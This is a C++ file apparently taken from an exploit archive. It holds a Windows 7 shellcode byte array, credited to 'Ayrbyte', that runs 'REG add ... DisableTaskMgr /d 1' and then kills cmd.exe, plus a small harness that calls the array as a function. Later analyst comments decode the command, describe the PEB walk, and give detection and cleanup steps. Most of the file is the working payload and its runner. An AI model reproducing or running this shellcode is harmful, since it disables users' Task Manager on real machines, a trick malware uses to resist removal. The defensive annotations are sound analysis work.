/*------------------------------------------------
==[ By Ayrbyte ]======[ Geng Simbe @ TKJ 1 Club ]========================================
Greets To : Adit Groundd SAndd Notte, Agos Wahyo, Aguenkk Rebel Black Sweet, Ahmad Bagoes,
Alvin Putra Marcdyto, Arieb Shezhaniea, Aviep Autiez, Chusnie Mubarok, Cumigh Gokil On Üç,
Dapat Di Hubungi, De Ayiph Ever, Dwi J Andreansyah, Jack PYing, Khuluq Gomez, Ola Amor Arpaz,
Pewe, Q-blueshiierezpector Screamoalltheway Aparatkeparat, Raden Mas Koko, Rivan Ardiansyah,
Rizqi Bogez, Rony C'Penghianat X Ciinta, Sukrex Dreizehn, Syafi'i,
and all Tkj 1 Club Family... ^_^
=========================================================================================
--------------------------------------------------
title : Windows7 Disable Task Manager Shellcode - 326 chars
Author: Ayrbyte
Category: local
Tested on: Windows7 Ultimate
Code : c++
Fb : fb.me/Ayrbyte
------------------------------------------------ */

/*
 * Analyst notes (derived from the bytes below).
 *
 * Effect: the ASCII immediates stored four bytes at a time spell this command line:
 *
 *   cmd /k REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
 *       /v DisableTaskMgr /t REG_DWORD /d 1 /f & taskkill /im cmd.exe /f
 *
 * i.e. it sets the per-user DisableTaskMgr policy value to 1 and then kills cmd.exe.
 * Only the current user's hive (HKCU) is written.
 *
 * Structure, 32-bit x86:
 *   - Two passes read fs:[0x30] and follow a linked list from there (the usual
 *     PEB loader-list walk), stopping at the 3rd entry in the first pass and the
 *     2nd entry in the second.
 *   - A constant offset is added to the module base found (0x2062 in the first pass,
 *     0x31526 in the second) and the result is called directly; no export lookup is
 *     visible. Presumably these offsets match only the Windows 7 build named in the
 *     header; confirm before relying on that.
 *   - The first call pushes ten arguments with the command-line buffer as the second;
 *     this looks like a CreateProcessA-style call (inferred from the argument shape).
 *     The second call takes no visible arguments and is presumably an exit routine.
 *   - Constants are written as 0x11111111 + value and then subtracted, which keeps
 *     zero bytes out of those immediates. The stores at displacement 0x80 and above
 *     still contain \x00 bytes.
 *
 * Detection and cleanup:
 *   - Registry: creation or modification of the DisableTaskMgr value under
 *     HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System.
 *   - Process telemetry: cmd.exe started with a "REG add ... DisableTaskMgr" command
 *     line, followed by "taskkill /im cmd.exe /f".
 *   - Deleting the value or setting it to 0 restores Task Manager for that user.
 */

#include <iostream>
using namespace std;

// Raw payload bytes. Each literal holds 32 bytes, so literal boundaries do not line up
// with instruction boundaries.
char code[] =
"\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x33\xDB\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11\x11\x11\xB9\x14"
"\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5\xB9\x73\x31\x11\x11\x2B\xC8\x03\xE9\x8B\xD4\xB9\x10\x21\x11\x11\x2B\xC8\x2B\xD1\xB9"
/* From here on the 4-byte immediates are the ASCII command line ("cmd ", "/k R", ...). */
"\x63\x6D\x64\x20\x89\x0A\xB9\x2F\x6B\x20\x52\x89\x4A\x04\xB9\x45\x47\x20\x61\x89\x4A\x08\xB9\x64\x64\x20\x48\x89\x4A\x0C\xB9\x4B"
"\x43\x55\x5C\x89\x4A\x10\xB9\x53\x6F\x66\x74\x89\x4A\x14\xB9\x77\x61\x72\x65\x89\x4A\x18\xB9\x5C\x4D\x69\x63\x89\x4A\x1C\xB9\x72"
"\x6F\x73\x6F\x89\x4A\x20\xB9\x66\x74\x5C\x57\x89\x4A\x24\xB9\x69\x6E\x64\x6F\x89\x4A\x28\xB9\x77\x73\x5C\x43\x89\x4A\x2C\xB9\x75"
"\x72\x72\x65\x89\x4A\x30\xB9\x6E\x74\x56\x65\x89\x4A\x34\xB9\x72\x73\x69\x6F\x89\x4A\x38\xB9\x6E\x5C\x50\x6F\x89\x4A\x3C\xB9\x6C"
"\x69\x63\x69\x89\x4A\x40\xB9\x65\x73\x5C\x53\x89\x4A\x44\xB9\x79\x73\x74\x65\x89\x4A\x48\xB9\x6D\x20\x2F\x76\x89\x4A\x4C\xB9\x20"
"\x44\x69\x73\x89\x4A\x50\xB9\x61\x62\x6C\x65\x89\x4A\x54\xB9\x54\x61\x73\x6B\x89\x4A\x58\xB9\x4D\x67\x72\x20\x89\x4A\x5C\xB9\x2F"
"\x74\x20\x52\x89\x4A\x60\xB9\x45\x47\x5F\x44\x89\x4A\x64\xB9\x57\x4F\x52\x44\x89\x4A\x68\xB9\x20\x2F\x64\x20\x89\x4A\x6C\xB9\x31"
"\x20\x2F\x66\x89\x4A\x70\xB9\x20\x26\x20\x74\x89\x4A\x74\xB9\x61\x73\x6B\x6B\x89\x4A\x78\xB9\x69\x6C\x6C\x20\x89\x4A\x7C\xB9\x2F"
/* The first \x00 byte of the array is in the next literal, at offset 326 by my count. */
"\x69\x6D\x20\x89\x8A\x80\x00\x00\x00\xB9\x63\x6D\x64\x2E\x89\x8A\x84\x00\x00\x00\xB9\x65\x78\x65\x20\x89\x8A\x88\x00\x00\x00\xB9"
"\x40\x77\x11\x11\x2B\xC8\x89\x8A\x8C\x00\x00\x00\x33\xDB\x8B\xF4\xB9\x65\x11\x11\x11\x2B\xC8\x8D\x4E\xAC\x51\x8D\x4E\xBC\x51\x53"
"\x53\xB9\x31\x13\x11\x11\x2B\xC8\x51\x53\x53\x53\x52\x53\xFF\xD5\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x33\xDB"
"\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11\x11\x11\xB9\x13\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5\xB8\x11\x11\x11\x11"
"\xB9\x37\x26\x14\x11\x2B\xC8\x03\xE9\xFF\xD5";

// Test harness: prints a length, waits for a key press, then calls the byte array as a function.
int main(){
// NOTE(review): strlen() stops at the first \x00 byte, so the value printed is the length of
// the prefix before it (matching the "326 chars" in the title), not the size of the array.
// NOTE(review): printf/strlen/system are used with only <iostream> included, and %u is paired
// with strlen's size_t result; this builds only where <iostream> pulls those declarations in.
printf("Shellcode Length is : %u\n",strlen(code));
// Runs the Windows shell built-in PAUSE, which blocks until a key is pressed.
system("PAUSE");
// `code` is an ordinary writable global array; casting it to a function pointer and calling it
// jumps into data. Where data pages are non-executable (DEP/NX) this call typically faults
// instead of running the payload.
int (*_13)() = (int(*)())code;
_13();
}
/*=================[ Geng Simbe @ TKJ 1 Club ]======*/